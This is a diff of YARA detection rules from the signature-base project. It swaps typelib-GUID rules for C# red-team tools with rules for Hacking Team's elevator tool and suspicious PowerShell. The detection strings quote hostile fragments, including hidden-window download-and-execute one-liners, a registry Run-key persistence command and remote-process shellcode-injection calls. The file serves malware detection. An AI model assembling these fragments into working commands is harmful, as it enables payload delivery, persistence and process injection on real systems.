 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d1d5e372c6e1314ebf317b51633b83b2f9336048cc223982052e078ca86ee6bc"
-		score = 75
+		hash = "b7ec5d36ca702cc9690ac7279fd4fea28d8bd060"
+		logic_hash = "f2860c0bb6176f7cc57cb703e9d4235c4cf0b9cc1c0e7c47fb4c8ba47155a616"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "f7fc19da-67a3-437d-b3b0-2a257f77a00b" ascii wide
-		$typelibguid0up = "F7FC19DA-67A3-437D-B3B0-2A257F77A00B" ascii wide
-		$typelibguid1lo = "47e85bb6-9138-4374-8092-0aeb301fe64b" ascii wide
-		$typelibguid1up = "47E85BB6-9138-4374-8092-0AEB301FE64B" ascii wide
-		$typelibguid2lo = "c7d854d8-4e3a-43a6-872f-e0710e5943f7" ascii wide
-		$typelibguid2up = "C7D854D8-4E3A-43A6-872F-E0710E5943F7" ascii wide
-		$typelibguid3lo = "d6685430-8d8d-4e2e-b202-de14efa25211" ascii wide
-		$typelibguid3up = "D6685430-8D8D-4E2E-B202-DE14EFA25211" ascii wide
-		$typelibguid4lo = "1df925fc-9a89-4170-b763-1c735430b7d0" ascii wide
-		$typelibguid4up = "1DF925FC-9A89-4170-B763-1C735430B7D0" ascii wide
-		$typelibguid5lo = "817cc61b-8471-4c1e-b5d6-c754fc550a03" ascii wide
-		$typelibguid5up = "817CC61B-8471-4C1E-B5D6-C754FC550A03" ascii wide
-		$typelibguid6lo = "60116613-c74e-41b9-b80e-35e02f25891e" ascii wide
-		$typelibguid6up = "60116613-C74E-41B9-B80E-35E02F25891E" ascii wide
+		$s1 = "\\sysnative\\CI.dll" ascii
+		$s2 = "setx TOR_CONTROL_PASSWORD" fullword ascii
+		$s3 = "mitmproxy0" fullword ascii
+		$s4 = "\\insert_cert.exe" ascii
+		$s5 = "elevator.dll" fullword ascii
+		$s6 = "CRTDLL.DLL" fullword ascii
+		$s7 = "fail adding cert" fullword ascii
+		$s8 = "DownloadingFile" fullword ascii
+		$s9 = "fail adding cert: %s" fullword ascii
+		$s10 = "InternetOpenA fail" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 6 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_0668 : FILE
+rule SIGNATURE_BASE_Hackingteam_Elevator_EXE : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "54c87578-f0f1-5108-a736-b6acd9624d29"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/RedCursorSecurityConsulting/CVE-2020-0668"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2809-L2823"
+		description = "Hacking Team Disclosure Sample - file elevator.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a68b68dd-372d-5572-a1e7-1b7e06e986d8"
+		date = "2015-07-07"
+		modified = "2023-12-05"
+		reference = "Hacking Team Disclosure elevator.c"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hackingteam_rules.yar#L58-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b72a5dff34f9674545acccad556204ed65dfdd587aa6a4d1fe542afd91e5a8d5"
-		score = 75
-		quality = 85
+		hash = "9261693b67b6e379ad0e57598602712b8508998c0cb012ca23139212ae0009a1"
+		logic_hash = "58f3c28fa69da0329a4cd5451a86260056076a9d0094965e9c23a63ef72cfc98"
+		score = 70
+		quality = 81
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "40a10420b9d49f87527bc0396b19ec29e55e9109e80b52456891243791671c1c"
+		hash2 = "92aec56a859679917dffa44bd4ffeb5a8b2ee2894c689abbbcbe07842ec56b8d"
 
 	strings:
-		$typelibguid0lo = "1b4c5ec1-2845-40fd-a173-62c450f12ea5" ascii wide
-		$typelibguid0up = "1B4C5EC1-2845-40FD-A173-62C450F12EA5" ascii wide
+		$x1 = "CRTDLL.DLL" fullword ascii
+		$x2 = "\\sysnative\\CI.dll" ascii
+		$x3 = "\\SystemRoot\\system32\\CI.dll" ascii
+		$x4 = "C:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe" fullword ascii
+		$s1 = "[*] traversing processes" fullword ascii
+		$s2 = "_getkprocess" fullword ascii
+		$s3 = "[*] LoaderConfig %p" fullword ascii
+		$s4 = "loader.obj" fullword ascii
+		$s5 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
+		$s6 = "[*] token restore" fullword ascii
+		$s7 = "elevator.obj" fullword ascii
+		$s8 = "_getexport" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of ( $x* ) and 3 of ( $s* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsrpcclients : FILE
+rule SIGNATURE_BASE_Worddoc_Powershell_Urldownloadtofile : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "70fd7431-8c32-52a4-be9f-2a19ef77f2cc"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/tyranid/WindowsRpcClients"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2825-L2851"
+		description = "Detects Word Document with PowerShell URLDownloadToFile"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f76c5f91-f67c-5754-b771-73383aba4d64"
+		date = "2017-02-23"
+		modified = "2024-04-03"
+		reference = "https://www.arbornetworks.com/blog/asert/additional-insights-shamoon2/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L10-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a15992e0f24ec7ecec5a42d8996102e60958c441a1926267718531c95c8b7e35"
+		logic_hash = "e4ea4e6092011bccfc5132186b910075361f4f77f01ae00c51c486d77a996775"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "33ee8a57e142e752a9c8960c4f38b5d3ff82bf17ec060e4114f5b15d22aa902e"
+		hash2 = "388b26e22f75a723ce69ad820b61dd8b75e260d3c61d74ff21d2073c56ea565d"
+		hash3 = "71e584e7e1fb3cf2689f549192fe3a82fd4cd8ee7c42c15d736ebad47b028087"
 
 	strings:
-		$typelibguid0lo = "843d8862-42eb-49ee-94e6-bca798dd33ea" ascii wide
-		$typelibguid0up = "843D8862-42EB-49EE-94E6-BCA798DD33EA" ascii wide
-		$typelibguid1lo = "632e4c3b-3013-46fc-bc6e-22828bf629e3" ascii wide
-		$typelibguid1up = "632E4C3B-3013-46FC-BC6E-22828BF629E3" ascii wide
-		$typelibguid2lo = "a2091d2f-6f7e-4118-a203-4cea4bea6bfa" ascii wide
-		$typelibguid2up = "A2091D2F-6F7E-4118-A203-4CEA4BEA6BFA" ascii wide
-		$typelibguid3lo = "950ef8ce-ec92-4e02-b122-0d41d83065b8" ascii wide
-		$typelibguid3up = "950EF8CE-EC92-4E02-B122-0D41D83065B8" ascii wide
-		$typelibguid4lo = "d51301bc-31aa-4475-8944-882ecf80e10d" ascii wide
-		$typelibguid4up = "D51301BC-31AA-4475-8944-882ECF80E10D" ascii wide
-		$typelibguid5lo = "823ff111-4de2-4637-af01-4bdc3ca4cf15" ascii wide
-		$typelibguid5up = "823FF111-4DE2-4637-AF01-4BDC3CA4CF15" ascii wide
-		$typelibguid6lo = "5d28f15e-3bb8-4088-abe0-b517b31d4595" ascii wide
-		$typelibguid6up = "5D28F15E-3BB8-4088-ABE0-B517B31D4595" ascii wide
+		$w1 = "Microsoft Forms 2.0 CommandButton" fullword ascii
+		$w2 = "Microsoft Word 97-2003 Document" fullword ascii
+		$p1 = "powershell.exe" fullword ascii
+		$p2 = "URLDownloadToFile" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0xcfd0 and 1 of ( $w* ) and all of ( $p* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpfruit : FILE
+rule SIGNATURE_BASE_Suspicious_Powershell_Code_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bf318530-b17d-5275-84b2-c284528bdae6"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/rvrsh3ll/SharpFruit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2853-L2867"
+		description = "Detects suspicious PowerShell code"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ec3c3682-d2de-52b7-bb49-b021ddf7f8ac"
+		date = "2017-02-22"
+		modified = "2024-04-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L32-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3fffebded16430beae82315532548a4c035f4c9e92a893f441b1d5049d97f73a"
-		score = 75
-		quality = 85
+		logic_hash = "0a254e0e4f0fdaa5907f5fe0b0c3d5226e2fdac4072349019abc2b2b11cbde30"
+		score = 60
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "3da2f6de-75be-4c9d-8070-08da45e79761" ascii wide
-		$typelibguid0up = "3DA2F6DE-75BE-4C9D-8070-08DA45E79761" ascii wide
+		$s1 = /$[a-z]=new-object net.webclient/ ascii
+		$s2 = /$[a-z].DownloadFile\("http:/ ascii
+		$s3 = /IEX $[a-zA-Z]{1,8}.downloadstring\(["']http/ ascii nocase
+		$s4 = "powershell.exe -w hidden -ep bypass -Enc" ascii
+		$s5 = "-w hidden -noni -nop -c \"iex(New-Object" ascii
+		$s6 = "powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpwitness : FILE
+rule SIGNATURE_BASE_Suspicious_Powershell_Webdownload_1 : HIGHVOL FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5e707da6-b2dd-511e-89ad-d19b93e8fca6"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/rasta-mouse/SharpWitness"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2869-L2883"
+		description = "Detects suspicious PowerShell code that downloads from web sites"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a763fb82-c840-531b-b631-f282bf035020"
+		date = "2017-02-22"
+		modified = "2024-04-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L52-L91"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7339e77168c23cc218892db37fad0a6806b15d57a83b75b5da53c2f5e04b327d"
-		score = 75
+		logic_hash = "56ad9c71c34956e94325452d829627a30b1499552725232a07100f05a050ef1b"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		nodeepdive = 1
 
 	strings:
-		$typelibguid0lo = "b9f6ec34-4ccc-4247-bcef-c1daab9b4469" ascii wide
-		$typelibguid0up = "B9F6EC34-4CCC-4247-BCEF-C1DAAB9B4469" ascii wide
+		$s1 = "System.Net.WebClient).DownloadString(\"http" ascii nocase
+		$s2 = "System.Net.WebClient).DownloadString('http" ascii nocase
+		$s3 = "system.net.webclient).downloadfile('http" ascii nocase
+		$s4 = "system.net.webclient).downloadfile(\"http" ascii nocase
+		$s5 = "GetString([Convert]::FromBase64String(" ascii nocase
+		$fp1 = "NuGet.exe" ascii fullword
+		$fp2 = "chocolatey.org" ascii
+		$fp3 = " GET /"
+		$fp4 = " POST /"
+		$fp5 = ".DownloadFile('https://aka.ms/installazurecliwindows', 'AzureCLI.msi')" ascii
+		$fp6 = " 404 "
+		$fp7 = "# RemoteSSHConfigurationScript" ascii
+		$fp8 = "<helpItems" ascii fullword
+		$fp9 = "DownloadFile(\"https://codecov.io/bash" ascii
+		$fp10 = "DownloadFile('https://get.golang.org/installer.exe" ascii
+		$fpg1 = "All Rights"
+		$fpg2 = "<html"
+		$fpg3 = "<HTML"
+		$fpg4 = "Copyright"
+		$fpg5 = "License"
+		$fpg6 = "<?xml"
+		$fpg7 = "Help" fullword
+		$fpg8 = "COPYRIGHT" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of ( $s* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Rexcrypter : FILE
+rule SIGNATURE_BASE_Powershell_In_Word_Doc : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5ebbeab3-3e93-5544-8f74-3d1b47335d8b"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/syrex1013/RexCrypter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2885-L2899"
+		description = "Detects a powershell and bypass keyword in a Word document"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c9d073ff-25c6-5751-92bf-e22ae7cfd5f5"
+		date = "2017-06-27"
+		modified = "2024-04-03"
+		reference = "Internal Research - ME"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L104-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "82edeed1b6641c45ab7e41eb0d98416760c3af9998bf391905192d732e658cc1"
-		score = 75
-		quality = 85
+		logic_hash = "6a9b295f1c430c285aedc5e6df268ea2023c8bdaccd04cf8a5d021419cd6bd64"
+		score = 50
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905"
 
 	strings:
-		$typelibguid0lo = "10cd7c1c-e56d-4b1b-80dc-e4c496c5fec5" ascii wide
-		$typelibguid0up = "10CD7C1C-E56D-4B1B-80DC-E4C496C5FEC5" ascii wide
+		$s1 = "POwErSHELl.ExE" fullword ascii nocase
+		$s2 = "BYPASS" fullword ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpersist : FILE
+rule SIGNATURE_BASE_Susp_Powershell_Sep17_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0c181186-7bb4-502b-8937-60cfd88ce689"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/fireeye/SharPersist"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2901-L2915"
+		description = "Detects suspicious PowerShell script in combo with VBS or JS "
+		author = "Florian Roth (Nextron Systems)"
+		id = "6d4b9113-173f-5c12-b440-7f1cef9e6ebb"
+		date = "2017-09-30"
+		modified = "2024-04-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L131-L148"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "85a96c0fcbbc0ddb2fd0eab77c33976345120e575e5954e35bb4a61ff534b15a"
-		score = 75
+		logic_hash = "6c8a1e72b2c4685a5a5749d86901b123976092aee373412bf04c62aa32145be8"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8e28521749165d2d48bfa1eac685c985ac15fc9ca5df177d4efadf9089395c56"
 
 	strings:
-		$typelibguid0lo = "9d1b853e-58f1-4ba5-aefc-5c221ca30e48" ascii wide
-		$typelibguid0up = "9D1B853E-58F1-4BA5-AEFC-5C221CA30E48" ascii wide
+		$x1 = "Process.Create(\"powershell.exe -nop -w hidden" fullword ascii nocase
+		$x2 = ".Run\"powershell.exe -nop -w hidden -c \"\"IEX " ascii
+		$s1 = "window.resizeTo 0,0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( filesize < 2KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2019_1253 : FILE
+rule SIGNATURE_BASE_Susp_Powershell_Sep17_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "3e18b533-1b85-5eaf-bb3d-aa5b90fd2e28"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/padovah4ck/CVE-2019-1253"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2917-L2931"
+		description = "Detects suspicious PowerShell script in combo with VBS or JS "
+		author = "Florian Roth (Nextron Systems)"
+		id = "e44d1dfc-0858-5248-a57f-efb5c647f4cc"
+		date = "2017-09-30"
+		modified = "2024-04-03"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L150-L170"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "964b3c21297295833a702160fc292dcbb06573e5341b81dfc05b641246c4b019"
-		score = 75
+		logic_hash = "0819f57afb6d1d878e4db4079bfd43ccac520829c877de04d16d8bd048a35ab5"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e387f6c7a55b85e0675e3b91e41e5814f5d0ae740b92f26ddabda6d4f69a8ca8"
 
 	strings:
-		$typelibguid0lo = "584964c1-f983-498d-8370-23e27fdd0399" ascii wide
-		$typelibguid0up = "584964C1-F983-498D-8370-23E27FDD0399" ascii wide
+		$x1 = ".Run \"powershell.exe -nop -w hidden -e " ascii
+		$x2 = "FileExists(path + \"\\..\\powershell.exe\")" fullword ascii
+		$x3 = "window.moveTo -4000, -4000" fullword ascii
+		$s1 = "= CreateObject(\"Wscript.Shell\")" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 20KB and ( ( uint16( 0 ) == 0x733c and 1 of ( $x* ) ) or 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Scout : FILE
+rule SIGNATURE_BASE_Wscript_Shell_Powershell_Combo : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cd24cca7-3bc0-5e7a-9817-dc3b26ec8358"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/jaredhaight/scout"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2933-L2947"
+		description = "Detects malware from Middle Eastern campaign reported by Talos"
+		author = "Florian Roth (Nextron Systems)"
+		id = "265ec471-d9ed-5cb6-a32b-cfa62fccdf64"
+		date = "2018-02-07"
+		modified = "2024-04-03"
+		reference = "http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L172-L193"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8bd735b4c4c3af209475b633c00fc8f01b2e9a3a5e5e29557a578d87e7bd0836"
-		score = 75
+		logic_hash = "0ab5808593c999c1ce342051a8e292153aa20516cf48071565d677399adfb160"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b"
 
 	strings:
-		$typelibguid0lo = "d9c76e82-b848-47d4-8f22-99bf22a8ee11" ascii wide
-		$typelibguid0up = "D9C76E82-B848-47D4-8F22-99BF22A8EE11" ascii wide
+		$s1 = ".CreateObject(\"WScript.Shell\")" ascii
+		$p1 = "powershell.exe" fullword ascii
+		$p2 = "-ExecutionPolicy Bypass" fullword ascii
+		$p3 = "[System.Convert]::FromBase64String(" ascii
+		$fp1 = "Copyright: Microsoft Corp." ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 400KB and $s1 and 1 of ( $p* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Grouper2 : FILE
+rule SIGNATURE_BASE_SUSP_Powershell_String_K32_Remprocess : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a9cd9a16-b2a5-5d15-af89-7a8d0f1835bb"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/l0ss/Grouper2/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2949-L2963"
+		description = "Detects suspicious PowerShell code that uses Kernel32, RemoteProccess handles or shellcode"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ad646e19-b132-5594-bea2-d74e96c06ebb"
+		date = "2018-03-31"
+		modified = "2024-04-03"
+		reference = "https://github.com/nccgroup/redsnarf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L195-L215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c1909e40b587d86766ff393cc056352ffaf40f2b56c3a1217b1526cc42e4eb7"
-		score = 75
+		logic_hash = "03c80de8e59e640709c4ee1912dc47c398e265f9b88845a6de88031e2eb46ba3"
+		score = 65
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash3 = "54a8dd78ec4798cf034c7765d8b2adfada59ac34d019e77af36dcaed1db18912"
+		hash4 = "6d52cdd74edea68d55c596554f47eefee1efc213c5820d86e64de0853a4e46b3"
 
 	strings:
-		$typelibguid0lo = "5decaea3-2610-4065-99dc-65b9b4ba6ccd" ascii wide
-		$typelibguid0up = "5DECAEA3-2610-4065-99DC-65B9B4BA6CCD" ascii wide
+		$x1 = "Throw \"Unable to allocate memory in the remote process for shellcode\"" fullword ascii
+		$x2 = "$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")" fullword ascii
+		$s3 = "$RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants." ascii
+		$s7 = "if ($RemoteProcHandle -eq [IntPtr]::Zero)" fullword ascii
+		$s8 = "if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))" fullword ascii
+		$s9 = "$Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, " ascii
+		$s15 = "$TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x7566 and filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Casperstager : FILE
+rule SIGNATURE_BASE_Powershell_JAB_B64 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0ad18d2b-b7cc-5316-a8e8-b05d4439b8e1"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/ustayready/CasperStager"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2965-L2981"
+		description = "Detects base464 encoded $ sign at the beginning of a string"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c18fa17b-aaa5-5a89-bc25-3cc51b5af103"
+		date = "2018-04-02"
+		modified = "2024-04-03"
+		reference = "https://twitter.com/ItsReallyNick/status/980915287922040832"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L217-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ac00affab78024da7a1cfa6e6fd43c6a8f3c7fec59499a85c1330ee593488eb"
-		score = 75
-		quality = 85
+		logic_hash = "4746a73774f945e63455ca7dd58ef67290f7c66d2dca80d06d52d2545c69a190"
+		score = 60
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "c653a9f2-0939-43c8-9b93-fed5e2e4c7e6" ascii wide
-		$typelibguid0up = "C653A9F2-0939-43C8-9B93-FED5E2E4C7E6" ascii wide
-		$typelibguid1lo = "48dfc55e-6ae5-4a36-abef-14bc09d7510b" ascii wide
-		$typelibguid1up = "48DFC55E-6AE5-4A36-ABEF-14BC09D7510B" ascii wide
+		$s1 = "('JAB" ascii wide
+		$s2 = "powershell" nocase
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 30KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Tellmeyoursecrets : FILE
+rule SIGNATURE_BASE_SUSP_PS1_Frombase64String_Content_Indicator : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "b00c353b-0446-5faa-87e5-0a7ba6ec2286"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xbadjuju/TellMeYourSecrets"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L2983-L2997"
+		description = "Detects suspicious base64 encoded PowerShell expressions"
+		author = "Florian Roth (Nextron Systems)"
+		id = "326c83ff-5d21-508f-b935-03ccdab6efa7"
+		date = "2020-01-25"
+		modified = "2024-04-03"
+		reference = "https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_powershell_susp.yar#L233-L284"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
